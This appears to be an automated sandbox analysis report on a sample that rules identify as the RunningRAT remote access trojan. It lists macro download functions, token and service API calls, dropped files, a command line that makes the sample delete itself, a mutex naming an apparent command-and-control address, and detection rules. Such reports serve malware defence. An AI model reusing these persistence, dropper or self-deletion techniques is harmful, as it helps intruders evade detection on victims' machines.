                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: OslfsL4J.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: XZXHAVGRAG.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: OslfsL4J.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: XZXHAVGRAG.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: OslfsL4J.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: XZXHAVGRAG.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD5CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,10_2_00DD5CF1
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD40B1 NtQuerySystemInformation,10_2_00DD40B1
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD5D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,10_2_00DD5D6A
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD5911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxWWorker,CreateActCtxWWorker,GetModuleHandleW,CreateActCtxWWorker,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,10_2_00DD5911
                          Source: C:\Windows\SysWOW64\encvbk.exe Code function: 10_2_00DD4136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,10_2_00DD4136
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_10001F48 strlen,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,4_2_10001F48
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_10001FBD LoadLibraryA,GetProcAddress,memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,WTSGetActiveConsoleSessionId,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary,4_2_10001FBD
                          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_100025A2 ExitWindowsEx,4_2_100025A2
                          Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Windows\SysWOW64\encvbk.exe
                          Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 3_2_054ED50B 3_2_054ED50B
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: blq.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                          Source: blq.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                          Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCXAFD2.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ~$cache1.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs blq.exe
                          Source: blq.exe, 00000000.00000003.1661622575.00000000006F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileNameA-2? vs blq.exe
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660433152.0000000000721000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000003.1661622575.00000000006E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe, 00000000.00000000.1654787110.00000000004A5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe, 00000000.00000000.1654787110.00000000004A5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameb! vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660495410.00000000006BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660495410.00000000006F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs blq.exe
                          Source: blq.exe, 00000000.00000003.1660495410.00000000006F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs blq.exe
                          Source: ._cache_blq.exe, 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe Binary or memory string: OriginalFileName vs blq.exe
                          Source: blq.exe Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe Binary or memory string: OriginalFilenameb! vs blq.exe
                          Source: ._cache_blq.exe.0.dr Binary or memory string: OriginalFilename vs blq.exe
                          Source: blq.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: blq.exe, type: SAMPLE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPEDMatched rule: GoldDragon_RunningRAT date = 2018-02-03, hash3 = 7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51, hash2 = 2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863, hash1 = 0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88, author = Florian Roth, description = Detects Running RAT from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: C:\Program Files (x86)\6795234.dll, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPEDMatched rule: MALWARE_Win_RunningRAT author = ditekSHen, description = Detects RunningRAT, clamav_sig = MALWARE.Win.Trojan.RunningRAT
                          Source: classification engine, Classification label: mal100.bank.troj.expl.evad.winEXE@36/50@17/5
                          Source: C:\Windows\SysWOW64\encvbk.exe, Code function: 10_2_00DD3C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,10_2_00DD3C66
                          Source: C:\Windows\SysWOW64\svchost.exe, Code function: OpenSCManagerA,_local_unwind2,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,ChangeServiceConfig2A,ChangeServiceConfig2A,wsprintfA,strlen,StartServiceA,4_2_10001B5B
                          Source: C:\Users\user\Desktop\._cache_blq.exe, Code function: 1_2_00401794 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcmpiA,CloseHandle,FreeLibrary,1_2_00401794
                          Source: C:\Windows\SysWOW64\encvbk.exe, Code function: 10_2_00DD205A CoCreateInstance,10_2_00DD205A
                          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle,4_2_10001A43
                          Source: C:\Users\user\Desktop\._cache_blq.exe, File created: C:\Program Files (x86)\6795234.dll
                          Source: C:\Users\user\Desktop\blq.exe, File created: C:\Users\user\Desktop\._cache_blq.exe
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7644
                          Source: C:\Windows\SysWOW64\encvbk.exe, Mutant created: \Sessions\1\BaseNamedObjects\103.36.221.195:8790:encvbk
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, File created: C:\Users\user\AppData\Local\Temp\OslfsL4J.xlsm
                          Source: Yara match, File source: blq.exe, type: SAMPLE
                          Source: Yara match, File source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match, File source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                          Source: Yara match, File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara match, File source: C:\ProgramData\Synaptics\RCXAFD2.tmp, type: DROPPED
                          Source: C:\Windows\SysWOW64\encvbk.exe, Command line argument: WLDP.DLL, 10_2_00DD4136
                          Source: C:\Windows\SysWOW64\encvbk.exe, Command line argument: localserver, 10_2_00DD4136
                          Source: C:\Users\user\Desktop\blq.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\Desktop\blq.exe, File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\blq.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: blq.exe, ReversingLabs: Detection: 92%
                          Source: C:\Users\user\Desktop\blq.exe, File read: C:\Users\user\Desktop\blq.exe
                          Source: unknown, Process created: C:\Users\user\Desktop\blq.exe "C:\Users\user\Desktop\blq.exe"
                          Source: C:\Users\user\Desktop\blq.exe, Process created: C:\Users\user\Desktop\._cache_blq.exe "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: unknown, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                          Source: C:\Users\user\Desktop\blq.exe, Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: C:\Users\user\Desktop\._cache_blq.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\encvbk.exe C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThread
                          Source: unknown, Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                          Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                          Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                          Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                          Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                          Source: C:\Windows\SysWOW64\WerFault.exe, Process created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: napinsp.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: wshbth.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: winrnr.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: devenum.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: devobj.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: msdmo.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: avicap32.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: msvfw32.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
